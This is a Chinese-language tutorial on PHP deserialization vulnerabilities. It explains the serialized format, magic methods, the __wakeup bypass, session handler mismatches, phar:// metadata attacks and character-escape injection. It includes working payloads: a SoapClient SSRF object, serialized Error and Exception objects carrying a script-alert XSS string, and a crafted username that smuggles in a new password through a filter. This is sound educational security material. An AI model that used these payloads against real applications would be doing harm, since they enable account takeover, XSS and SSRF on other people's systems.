序列化和反序列化介紹
serialize()將一個對象轉換成一個字符串,unserialize()將字符串還原為一個對象,在PHP應用中,序列化和反序列化一般用做緩存,比如session緩存,cookie等。簡單點講序列化就是把一個對象變為可以傳輸的字符串,而反序列化就是把字符換換原為對象。
簡單例子
<?php class test{ public $suifeng="shuai"; } $a=new test(); //實例化一個對象 $b=serialize($a); //進行序列化 echo $b; //輸出序列化后的字符串 echo '<br>'; echo "我是分割線"; $c=unserialize($b); //把序列化后的字符串反序列化 echo '<br>'; echo $c->suifeng; ?>
這里我們再來看看反序列化后輸出字符的含義
首先輸出的內容為
O:4:"test":1:{s:7:"suifeng";s:5:"shuai";}
O->object 4->object的長度 test->object的名稱 1->object中變量個數 s->變量名數據類型 7->變量名長度 suifeng->變量名 S->變量值數據類型 5->變量值長度 shuai->變量的值
PHP其他數據類型
a - array b - boolean d - double i - integer o - common object r - reference s - string C - custom object O - class N - null R - pointer reference U - unicode string
PHP常見魔法函數
__construct() //一個對象創建時被調用
__destruct() //一個對象銷毀前被調用
__call() //調用類不存在的方法時執行
__callStatic() //調用類不存在的靜態方式方法時執行。
__wakeup() //將在反序列化之后立即被調用
__sleep() //在對象被序列化前被調用
__toString() //當一個對象被當做字符串使用時被調用
__get() //用於從不可訪問的屬性讀取數據
__set() //用於將數據寫入不可訪問屬性
__invoke() //調用函數的方式調用一個對象時的回應方法
__isset() //在不可訪的屬性上調用isset()或empty()觸發
__unset() //在不可訪的屬性上使用unset()時觸發
public、protected、private下序列化對象區別
php v7.x反序列化的時候對訪問類別不敏感
public變量
直接變量名反序列化出來
protected變量
\x00 + * + \x00 + 變量名
可以用S:5:"\00*\00op"來代替s:5:"?*?op"
private變量
\x00 + 類名 + \x00 + 變量名
反序列化漏洞形成條件
1、unserialize函數的參數可控
2、后台使用了相應的PHP中的魔法函數
反序列化漏洞原理
我們先運行如下一串代碼
<?php class ABC{ function __construct(){ echo '調用了構造函數<br>'; } function __destruct(){ echo '調用了析構函數<br>'; } function __wakeup(){ echo '調用了蘇醒函數<br>'; } } echo '創建對象a<br>'; $a=new ABC; echo '序列化<br>'; $a_ser=serialize($a); echo '反序列化<br>'; $a_unser=unserialize($a_ser); echo '對象快死了!'; ?>
PHP語言本身漏洞
還有一種PHP語言本身漏洞碰到某種特點情況導致的反序列化漏洞
如:__wakeup失效引發(CVE-2016-7124)
php版本< 5.6.25 | < 7.0.10
當序列化字符串中,如果表示對象屬性個數的值大於真實的屬性個數時就會跳過__wakeup()的執行
PHP_session序列化問題
當session_start()被調用或者php.ini中session.auto_start為1時,PHP內部調用會話管理器,訪問用戶session被序列化以后,存儲到指定目錄(默認為/tmp)。
PHP中有三種序列化處理器,如下:
| 處理器 |
對應的存儲格式 |
| php |
鍵名 + 豎線 + 經過serialize()函數反序列化處理的值 |
| php_binary |
鍵名的長度對應的ASCII字符 + 鍵名 + 經過serialize()函數反序列化處理的值 |
| php_serialize(php>=5.5.4) |
經過serialize()函數反序列處理的數組 |
配置文件php.ini中含有這幾個與session存儲配置相關的配置項:
session.save_path="" --設置session的存儲路徑,默認在/tmp
session.auto_start --指定會話模塊是否在請求開始時啟動一個會話,默認為0不啟動
session.serialize_handler --定義用來序列化/反序列化的處理器名字。默認使用php
session.save_handler="" --設定用戶自定義存儲函數,如果想使用PHP內置會話存儲機制之外的可以使用本函數(數據庫等方式),比如files就是session默認以文件的方式進行存儲
且在PHP中默認使用的是PHP引擎,如果想要修改成其他引擎,我們需要添加代碼ini_set('session.serialize_handler', '需要設置的引擎'),例:
<?php
ini_set('session.serialize_handler', 'php_serialize');
session_start();
存儲的文件是以sess_sessionid來進行命名的,文件的內容就是session值的序列話之后的內容,例如session文件名稱為:sess_1ja9n59ssk975tff3r0b2sojd5
如果PHP在反序列化存儲的$_SEESION數據時的使用的處理器和序列化時使用的處理器不同,會導致數據無法正確反序列化,通過特殊的偽造,甚至可以偽造任意數據。
PHP反序列化可以利用的原生類
__call
SoapClient
這個也算是目前被挖掘出來最好用的一個內置類,php5、7都存在此類。
SSRF
<?php
$a = new SoapClient(null,array('uri'=>'http://example.com:5555', 'location'=>'http://example.com:5555/aaa'));
$b = serialize($a);
echo $b;
$c = unserialize($b);
$c->a();
__toString
Error
適用於php7版本
XSS
開啟報錯的情況下:
<?php
$a = new Error("<script>alert(1)</script>");
$b = serialize($a);
echo urlencode($b);
//Test
$t = urldecode('O%3A5%3A%22Error%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A25%3A%22%3Cscript%3Ealert%281%29%3C%2Fscript%3E%22%3Bs%3A13%3A%22%00Error%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A18%3A%22%2Fusercode%2Ffile.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A2%3Bs%3A12%3A%22%00Error%00trace%22%3Ba%3A0%3A%7B%7Ds%3A15%3A%22%00Error%00previous%22%3BN%3B%7D');
$c = unserialize($t);
echo $c;
Exception
適用於php5、7版本
XSS
開啟報錯的情況下:
<?php
$a = new Exception("<script>alert(1)</script>");
$b = serialize($a);
echo urlencode($b);
//Test
$c = urldecode('O%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A25%3A%22%3Cscript%3Ealert%281%29%3C%2Fscript%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A18%3A%22%2Fusercode%2Ffile.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A2%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7Ds%3A19%3A%22%00Exception%00previous%22%3BN%3B%7D');
echo unserialize($c);
phar://協議
概念
一個php應用程序往往是由多個文件構成的,如果能把他們集中為一個文件來分發和運行是很方便的,這樣的列子有很多,比如在window操作系統上面的安裝程序、一個jquery庫等等,為了做到這點php采用了phar文檔文件格式,這個概念源自java的jar,但是在設計時主要針對 PHP 的 Web 環境,與 JAR 歸檔不同的是Phar歸檔可由 PHP 本身處理,因此不需要使用額外的工具來創建或使用,使用php腳本就能創建或提取它。phar是一個合成詞,由PHP和 Archive構成,可以看出它是php歸檔文件的意思(簡單來說phar就是php壓縮文檔,不經過解壓就能被 php 訪問並執行)
phar組成結構
stub:它是phar的文件標識,格式為xxx<?php xxx; __HALT_COMPILER();?>;
manifest:也就是meta-data,壓縮文件的屬性等信息,以序列化存儲
contents:壓縮文件的內容
signature:簽名,放在文件末尾
這里有兩個關鍵點,一是文件標識,必須以__HALT_COMPILER();?>結尾,但前面的內容沒有限制,也就是說我們可以輕易偽造一個圖片文件或者其它文件來繞過一些上傳限制;二是反序列化,phar存儲的meta-data信息以序列化方式存儲,當文件操作函數通過phar://偽協議解析phar文件時就會將數據反序列化,而這樣的文件操作函數有很多
前提條件
php.ini中設置為phar.readonly=Off
php version>=5.3.0
demo測試
根據文件結構我們來自己構建一個phar文件,php內置了一個Phar類來處理相關操作
<?php class TestObject { } @unlink("phar.phar"); $phar = new Phar("phar.phar"); //后綴名必須為phar $phar->startBuffering(); $phar->setStub("<?php __HALT_COMPILER(); ?>"); //設置stub $o = new TestObject(); $phar->setMetadata($o); //將自定義的meta-data存入manifest $phar->addFromString("test.txt", "test"); //添加要壓縮的文件 //簽名自動計算 $phar->stopBuffering(); ?>
可以很明顯看到manifest是以序列化形式存儲的
如果現在通過phar://包裝器對我們現有的Phar文件執行文件操作,則其序列化元數據將被反序列化。這意味着我們在元數據中注入的對象被加載到應用程序的范圍中。如果此應用程序具有已命名的類AnyClass並且具有魔術方法__destruct()或已__wakeup()定義,則會自動調用這些方法。這意味着我們可以在代碼庫中觸發任何析構函數或喚醒方法。更糟糕的是,如果這些方法對我們注入的數據進行操作,那么這可能會導致進一步的漏洞。
以下是受影響函數列表
這時利用phar://協議即可
利用條件
phar 文件能夠上傳
文件操作函數參數可控, : ,/ phar 等特殊字符沒有被過濾
有可用的魔術方法作為"跳板"
反序列化字符逃逸
PHP 在反序列化時,底層代碼是以 ; 作為字段的分隔,以 } 作為結尾(字符串除外),並且是根據長度判斷內容的,同時反序列化的過程中必須嚴格按照序列化規則才能成功實現反序列化 。
下面我們來分析一段代碼
<?php class test{ public $suifeng="shuai"; } $a=new test(); $b=serialize($a); echo $b; $c=unserialize($b); echo '<br>'; echo $c->suifeng; ?>
發現序列化為 O:4:"test":1:{s:7:"suifeng";s:5:"shuai";},也正常進行了反序列化。當我們把序列化結果修改為O:4:"test":1:{s:7:"suifeng";s:5:"shuai";}i:1;s:4:"test"; 后發現還是會正常解析。
但是我們修改其長度就會報錯,如 O:4:"test":1:{s:7:"suifeng";s:4:"shuai";}
知道這個特性我們再來分析如下一段代碼
<?php function filter($string){ return str_replace('test','test1',$string); } $username = "admin"; $password = "1234"; $user = array($username, $password); var_dump(serialize($user)); echo '\n'; $r = filter(serialize($user)); var_dump($r); echo '\n'; var_dump(unserialize($r));
可以看到反序列化為了a:2:{i:0;s:5:"admin";i:1;s:4:"1234";},當我們把username參數修改為admintest時,后續代碼流程先反序列化$user,然后再執行Filter函數里面的str_place函數,把test替換成了test1,這樣就導致了長度不一致,最終導致反序列化失敗。
a:2:{i:0;s:9:"admintest";i:1;s:4:"1234";}
a:2:{i:0;s:9:"admintest1";i:1;s:4:"1234";}
假設這個代碼流程是一個創建賬號的代碼流程,此時$username可由用戶可控制,這時我們就可以通過控制可控參數導致反序列化字符逃逸。其本質其實也是和sql注入一樣,對雙引號,大括號的閉合,只不過反序列化字符逃逸需要滿足一些其特點的條件。接下來我們就對其進行構造payload。
因為其嚴格按照以 ; 作為字段的分隔,以 } 作為結尾(字符串除外),所以我們可以這么對其進行閉合。
可以看到我們構造$username=admintest";i:1;s:6:"123456";},經過序列化后序列化為了a:2:{i:0;s:29:"admintest";i:1;s:6:"123456";}";i:1;s:4:"1234";},這樣的序列化我們再對其進行反序列化紅色部分就不會進入到反序列化中。但是可以看到替換后還是沒有反序列化成功,我們來分析一下。
替換后我們得到
a:2:{i:0;s:29:"admintest1";i:1;s:6:"123456";}";i:1;s:4:"1234";},紅色部分在進行反序列化的時候會被進行忽略,那進行反序列化的字段就為
a:2:{i:0;s:29:"admintest1";i:1;s:6:"123456";}
可以看到這里的s:29:"admintest1"明顯不對,所以我們的反序列化會失敗,那么怎么去讓這里保持正確呢,這也就是我們反序列化字符字符逃逸特點條件需要考慮的東西。
在str_replace('test','test1',$string)代碼里,test替換為了test1,test1相比之前test多了一個字符,所以只要我們再加上只夠的test讓其替換成test1,且讓長度相等,這樣就可以讓我們的反序列化正常進行了。
我們構造payload
admintesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttest";i:1;s:6:"123456";}
這樣我們就對改業務的密碼進行了修改